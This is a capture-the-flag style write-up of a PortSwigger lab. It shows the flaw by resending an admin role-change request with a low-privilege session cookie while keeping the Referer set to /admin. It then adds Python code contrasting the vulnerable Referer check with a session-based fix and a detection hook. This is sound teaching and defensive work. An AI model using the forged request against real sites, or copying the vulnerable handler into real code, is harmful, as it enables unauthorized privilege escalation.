
Multistep process with no access control on one step

Introduction

Portswigger

Category: Access control vulnerabilities

Write-up date: 10/06/2025

Question: This lab has an admin panel with a flawed multistep process for changing a user's role. You can familiarize yourself with the admin panel by logging in using the credentials administrator:admin.

To solve the lab, log in using the credentials wiener:peter and exploit the flawed access controls to promote yourself to become an administrator.

Point: PRACTITIONER

Recon

The admin panel link is revealed to us, but when we try to access it the server returns "Admin interface only available if logged in as an administrator".

Trying the administrator account: when you promote the user carlos to admin, the client sends a request to the server through the endpoint /admin-roles with the username carlos and the action upgrade.

GET /admin-roles?username=wiener&action=upgrade HTTP/2
Host: 0a9f00d70443245f8265298f00a5002f.web-security-academy.net
Cookie: session=admin_redacted
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://0a9f00d70443245f8265298f00a5002f.web-security-academy.net/admin
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

Exploit

The page has a mechanism that blocks us from accessing the admin panel /admin, and the endpoint /admin-roles is also blocked. But the developer has made a critical mistake: instead of checking the session, the server checks the Referer header, assuming that any request coming from the /admin page must come from an administrator.

Using the request captured at the earlier stage, swap in our own session cookie while keeping the Referer header; we can then send the request and complete the lab.

GET /admin-roles?username=wiener&action=upgrade HTTP/2
Host: 0a9f00d70443245f8265298f00a5002f.web-security-academy.net
Cookie: session=wiener_redacted
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: https://0a9f00d70443245f8265298f00a5002f.web-security-academy.net/admin
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
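To make the flaw concrete from the defender's side, here is an added example (not code from the write-up or from PortSwigger) that models the /admin-roles handler in plain Python. It parses the kind of raw request shown above, runs it through a Referer-based check like the one the write-up describes, and then through a session-based check that resolves the caller's role server-side. The session store, the user table and the session-cookie values are constructed for the demonstration; only the lab hostname and the request shape come from the page.

```python
"""
Added example (not part of the original write-up): a minimal model of the
/admin-roles handler, showing a Referer-based check beside a session-based
check. SESSIONS, USERS and the request text below are constructed.
"""
from urllib.parse import parse_qs, urlsplit

# Constructed session store: session cookie value -> username.
SESSIONS = {"admin_redacted": "administrator", "wiener_redacted": "wiener"}

# Constructed user table: username -> role.
USERS = {"administrator": "admin", "wiener": "user", "carlos": "user"}

# Origin taken from the lab requests shown in the write-up.
ADMIN_ORIGIN = "https://0a9f00d70443245f8265298f00a5002f.web-security-academy.net"

# Constructed request: wiener's session cookie with the Referer left at /admin.
WIENER_REQUEST = f"""GET /admin-roles?username=wiener&action=upgrade HTTP/2
Host: 0a9f00d70443245f8265298f00a5002f.web-security-academy.net
Cookie: session=wiener_redacted
Referer: {ADMIN_ORIGIN}/admin
"""

# Constructed request: the same call made by the administrator's session.
ADMIN_REQUEST = WIENER_REQUEST.replace("wiener_redacted", "admin_redacted")


def parse_request(raw: str) -> dict:
    """Parse a raw HTTP request (request line plus headers) into a dict."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    parts = urlsplit(target)
    cookies = {}
    for item in headers.get("cookie", "").split(";"):
        if "=" in item:
            key, value = item.strip().split("=", 1)
            cookies[key] = value
    return {
        "method": method,
        "path": parts.path,
        "query": {k: v[0] for k, v in parse_qs(parts.query).items()},
        "headers": headers,
        "cookies": cookies,
    }


def apply_role_change(req: dict, users: dict) -> str:
    """The business action itself; every authorization decision happens before this."""
    target = req["query"].get("username")
    action = req["query"].get("action")
    if target not in users or action not in ("upgrade", "downgrade"):
        return "400 Bad Request"
    users[target] = "admin" if action == "upgrade" else "user"
    return f"200 OK: {target} is now {users[target]}"


def vulnerable_admin_roles(req: dict, users: dict) -> str:
    """Flawed check: trusts the client-supplied Referer header as proof of admin rights."""
    referer = req["headers"].get("referer", "")
    if not referer.startswith(ADMIN_ORIGIN + "/admin"):
        return "403 Forbidden"
    return apply_role_change(req, users)


def hardened_admin_roles(req: dict, users: dict, sessions: dict) -> str:
    """Fixed check: resolve the session server-side and require the admin role."""
    actor = sessions.get(req["cookies"].get("session", ""))
    if actor is None or users.get(actor) != "admin":
        return "403 Forbidden"
    return apply_role_change(req, users)


def needs_review(req: dict, users: dict, sessions: dict) -> bool:
    """Detection hook: flag any /admin-roles call whose session is not an admin."""
    actor = sessions.get(req["cookies"].get("session", ""))
    return req["path"] == "/admin-roles" and users.get(actor) != "admin"


if __name__ == "__main__":
    wiener = parse_request(WIENER_REQUEST)
    print("vulnerable:", vulnerable_admin_roles(wiener, dict(USERS)))
    print("hardened:  ", hardened_admin_roles(wiener, dict(USERS), SESSIONS))
    print("flagged:   ", needs_review(wiener, USERS, SESSIONS))
```

The hardened handler never looks at the Referer; the only input it trusts is the session identifier, which it resolves against server-side state before checking the role. The needs_review helper shows the detection angle: because a legitimate role change is always made from an admin session, any /admin-roles request arriving from a non-admin session is worth an alert regardless of what headers it carries.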

[Screenshot: solved.png]